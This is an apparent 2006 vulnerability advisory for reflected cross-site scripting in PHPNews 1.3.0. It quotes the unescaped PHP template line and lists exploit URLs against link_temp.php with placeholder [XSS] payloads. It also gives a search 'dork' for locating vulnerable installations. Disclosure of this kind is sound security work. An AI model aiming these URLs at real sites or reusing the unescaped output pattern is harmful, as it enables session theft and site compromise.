PHPNews 1.3.0 XSS

2006-12-05T00:00:00
ID SECURITYVULNS:DOC:15294
Type securityvulns
Reporter Securityvulns
Modified 2006-12-05T00:00:00

Description

PHP Script: PHPNews 1.3.0 Class: XSS Website: http://newsphp.sourceforge.net Found by: Detefix dork: inurl:phpnews


  • Vulnerable Code:

<?php print<<<EOT <a href="$url?action=fullnews&amp;showcomments=1&amp;id=$id">$subject</a> by $username on $time<br />


  • Exploits:

http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]